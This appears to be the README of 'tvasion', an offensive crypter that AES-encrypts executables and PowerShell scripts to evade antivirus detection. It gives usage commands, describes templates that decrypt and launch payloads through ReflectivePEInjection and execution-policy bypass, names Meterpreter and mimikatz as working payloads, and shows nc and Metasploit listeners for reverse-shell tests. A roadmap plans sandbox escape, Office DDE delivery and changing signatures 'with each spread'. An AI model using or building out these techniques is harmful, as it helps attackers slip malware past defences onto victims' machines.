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🎭 Anti virus evasion based on file signature change via AES encryption with Powershell and C# AV evasion templates which support executable and Powershell payloads with Windows executable, Powershell or batch output. Developed with Powershell on Linux for Windows targets :)

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🎭 tvasion - Powershell / C# AES anti virus evasion

Anti virus evasion based on file signature change via AES encryption with Powershell and C# AV evasion templates which support executable and Powershell payloads with Windows executable, Powershell or batch output. Developed with Powershell on Linux for Windows targets :)

Buzzwords: Anti virus evasion, AV evasion, crypter, AES encryption, ReflectivePEInjection, PowerShell execution policy bypass

!!! Work in progress. See TODO. Powershell related ouput not FUD !!!


  • outputs 32 bit executable (.exe), Powershell (.ps1) or batch (.bat)
  • works with excutable + Powershell payloads
  • AES encryption for file signature change
  • no hard drive traces / no hard disk write operation
  • Powershell and C# evasion templates available
  • EXOTIC: Powershell, mono mcs based developed on Linux for Windows targets :-)


./tvasion.ps1 -h
tvasion: AES based anti virus evasion
./tvasion.ps1 -t (exe|bat|ps1|b64ps1|b64) [PAYLOAD (exe|ps1)] OR ./tvasion.ps1 [PAYLOAD (exe|ps1)] -t (exe|bat|ps1|b64ps1|b64)
[PAYLOAD (exe|ps1)]                 input file path. requires: exe, ps1                     required
-t (exe|ps1|bat|b64ps1|b64)         output file type: exe, ps1, bat, b64ps1, b64            required
-i (PATH)                           path to icon. requires: .exe output (-t exe)            optional
-f (PATH)                           path to template                                        optional
-o (PATH)                           set output directory. default is ./out/                 optional
-d                                  generate debug output                                   optional
-h                                  display this help                                       optional
./tvasion.ps1 -t exe tests/ReverseShell.ps1                                       # generate windows executable (.exe) from powershell
./tvasion.ps1 -t exe out/Meterpreter_amd64.exe -i tests/ghost.ico                 # generate windows executable (.exe) from executable, custom icon (-i)
./tvasion.ps1 -t bat tests/ReverseShell.ps1                                       # generate batch (.bat) from powershell
./tvasion.ps1 -t ps1 out/Meterpreter_amd64.exe -f mytpl1.ps1 -o ../ -d            # ... .exe -> .ps1, custom template (-f), out dir (-o), debug (-d)

Files generated in ./out directory See more examples in: test file

Setup Debian Stretch / Kali Linux


  • PowerShell
  • mono-mcs (optional but required for cross plattform executable compilation for executeable payloads)
# setup Powershell for Linux. see link above, be root

# install compiler depencies (optional, required for executable output)
apt-get install -y mono-mcs

# clone with git
git clone

Advanced usage


Change AES decryption template source code to make sure evasion output is undetectable by anti virus solutions.

C# and powershell templates from ./templates/ directory basically do:

decode -> decrypt -> launch payload

It's input / output type dependent which template needs changes. See here:

payload type output type template from ./templates/ folder details
powershell powershell default.ps1 Invoke-Expression
executable powershell default_exe.ps1 Invoke-Expression + ReflectivePEInjection (*1)
executable executable default_exe.cs PEInjection (*1)
powershell executable default.cs PowerShell execution policy bypass with -Enc (*2)
powershell batch default_bat.ps1 + default.bat PowerShell execution policy bypass with -C + Invoke-Expression
executable batch default_exe_bat.ps1 + default.bat PowerShell execution policy bypass with -C + Invoke-Expression + ReflectivePEInjection (*1)
powershell base64 powershell default.ps1 Invoke-Expression
executable base64 powershell default_exe.ps1 Invoke-Expression + ReflectivePEInjection (*1)

(*1) not all binaries work; Meterpreter, mimikatz work. See DEP, ASLR, and what to do against.

(*2) payload size restriction of arguments length of process.startupinfo.arguments see TODO

./templates/lib/ contain helper which get encrypted together with payload. You do not need to care about these files for a successful AV evasion.

Payload is created by tvasion.ps1 like this:

        -> gzip compression -> base64 encoding -> pasted & compiled into C# dotnet assembly -> AES encryption -> base64 encoding -> pasted & compiled into C# windows executeable (.exe -> .exe)
payload -> AES encryption -> base64 encoding 
                                -> pasted into powershell script (.ps1 -> .ps1) 
                                        -> base64 encoding 
                                                -> pasted & compiled into C# windows executeable (.ps1 -> .exe)             
                                                -> pasted into batch file (.ps1 | .exe -> .bat)

Obscure options

Option Explanation
-t b64ps1 base64 encoded AES encrypted powershell output. "base64 powershell" @ template table
-t b64 plain base64 encoded output (encoding only)

For more options see:

 ./tvasion.ps1 -h


Powershell reverse shell is included in ./tests/ folder for testing purposes.

Run tests:

  • setup metasploit framework
  • change IP to your IP in configruation block of: ./tests.ps1
  • run msfconsole in seperate terminal
  • run ./tests.ps1 for compilation / test file creation. see ./out/ for results
  • listen for reverse connections on linux machine:
# listen for reverse shell connections from ./tests/ReverseShell.ps1
nc -nvlp 4242
# use msfconsole you opened in other terminal, we need this launched before to generate Meterpreter in ./tests.ps1
# listen with metasploit multi handler for windows/meterpreter/reverse_tcp on port 4444 (tests.ps1 generated Meterpreter will connect this port)
cd ./tvasion/tests/
resource msf_multihandler.rc
  • copy files from ./out/ directory to target Windows machine & execute

Roadmap / TODO / ideas (feel free to work on)

  • add shellcode payloads as input / output type
  • add compression / script comment removement for powershell payloads / templates
  • add better / alternative templates
    • fix ps1 -> exe payload size restriction / add alternative C# launcher via System.Management.Automation
    • add alternative ps1 -> ps1 template via System.Management.Automation
    • add encrypted window hide via kernel32 to all powershell stage2 templates (scanners may match for -windowstyle hidden on pwsh launch)?
  • add more evasion / obfocusation functionality:
    • randomize variable names, white spaces / line breaks / tabs, call order (between markers only)
    • hide native method names
    • better cloaking for encrypted payload string
    • auto generated useless code
    • anti virus sandbox escape (maybe via long execution delay or try to allocate many resources until sandbox stops processing)
  • make ./tvasion.ps1 self run on windows not created files only (never tested, this makes it easy to integrate tvasion in your tools to automatically change your signature with each spread)
  • add new output types:
    • vcf ouput (local code execution, if working in 2019)
    • .doc + .xls ouput via DDEAUTO or OLE / Powerquery (local code execution without macro)
  • add executable file binder (PE file injection)?
  • create cmdlet / proper psm module?
  • bring back pipes support (string / hex pipes only, pswh has no binary pipes)
  • use consistent rules for replacements: #REPLACE;0#, #REPLACE;1#
  • add raw hex encoded ps1 output
  • add possibility to bind multiple files ./tvasion.ps1 payload1.exe payloadX.exe...


Discuss features, report issues, questions -> here.

Developer -> fork & pull ;)



🎭 Anti virus evasion based on file signature change via AES encryption with Powershell and C# AV evasion templates which support executable and Powershell payloads with Windows executable, Powershell or batch output. Developed with Powershell on Linux for Windows targets :)







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